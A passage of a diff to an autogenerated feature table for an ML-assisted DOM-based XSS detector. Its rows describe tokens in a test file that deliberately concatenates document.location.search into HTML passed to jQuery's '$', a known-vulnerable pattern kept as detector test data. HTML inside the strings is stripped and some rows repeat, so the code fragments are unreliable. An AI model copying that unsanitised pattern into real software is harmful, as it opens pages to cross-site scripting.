    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:10 | "
    " | stringConcatenatedWith | -endpoint- tainted + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:17 | "
    ".concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:17 | "
    ".concat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:17 | "
    ".concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:17 | "
    ".concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:17 | "
    ".concat | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | exceptional return of "
    " ... ainted) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | exceptional return of "
    " ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | exceptional return of "
    " ... ainted) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | exceptional return of "
    " ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:26 | exceptional return of "
    " ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:33 | "
    " ... .concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:33 | "
    " ... .concat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:33 | "
    " ... .concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:33 | "
    " ... .concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:33 | "
    " ... .concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18266,6 +125259,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | exceptional return of "
    " ... /div>") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | exceptional return of "
    " ... /div>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | exceptional return of "
    " ... /div>") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | exceptional return of "
    " ... /div>") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:4:6:43 | exceptional return of "
    " ... /div>") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:12:6:17 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:12:6:17 | concat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:12:6:17 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:12:6:17 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:12:6:17 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | CalleeFlexibleAccessPath | ?.concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18274,6 +125277,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:19:6:25 | tainted | stringConcatenatedWith | '
    ' -endpoint- '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:28:6:33 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:28:6:33 | concat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:28:6:33 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:28:6:33 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:28:6:33 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | CalleeFlexibleAccessPath | ?.concat().concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18282,6 +125290,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:6:35:6:42 | "
    " | stringConcatenatedWith | '
    ' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:39 | $([" tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:39 | $([" tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:2:7:39 | exceptional return of $([" ... /div>"] | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:36 | ["
    ... "].join | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:36 | ["
    ... "].join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:36 | ["
    ... "].join | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:36 | ["
    ... "].join | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:36 | ["
    ... "].join | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18289,30 +125322,75 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | exceptional return of ["
    ... .join() | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | exceptional return of ["
    ... .join() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | exceptional return of ["
    ... .join() | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | exceptional return of ["
    ... .join() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:4:7:38 | exceptional return of ["
    ... .join() | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:5:7:11 | "
    " | stringConcatenatedWith | -endpoint- tainted + '
    ' | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:14:7:20 | tainted | stringConcatenatedWith | '
    ' -endpoint- '
    ' | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:23:7:30 | "
    " | stringConcatenatedWith | '
    ' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:33:7:36 | join | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:33:7:36 | join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:33:7:36 | join | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:33:7:36 | join | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:7:33:7:36 | join | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:2 | $ | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:2 | $ | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | $("
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | $("
    ") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | $("
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | $("
    ") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | exceptional return of $("
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | exceptional return of $("
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | exceptional return of $("
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:2:9:35 | exceptional return of $("
    ") | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:15 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:15 | "
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:25 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:25 | "
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:34 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:4:9:34 | "
    " | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18332,6 +125410,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:29:9:34 | "\\"/>" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:29:9:34 | "\\"/>" | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:9:29:9:34 | "\\"/>" | stringConcatenatedWith | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | $(`
    `) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | $(`
    `) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | $(`
    `) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | $(`
    `) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | $(`
    `) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | exceptional return of $(`
    `) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | exceptional return of $(`
    `) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | exceptional return of $(`
    `) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | exceptional return of $(`
    `) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:2:10:28 | exceptional return of $(`
    `) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:4:10:27 | `
    ` | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:4:10:27 | `
    ` | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:4:10:27 | `
    ` | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18357,12 +125450,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:24:10:26 | "/> | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:24:10:26 | "/> | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:10:24:10:26 | "/> | stringConcatenatedWith | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | $("
    ")) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | $("
    ")) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | $("
    ")) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | $("
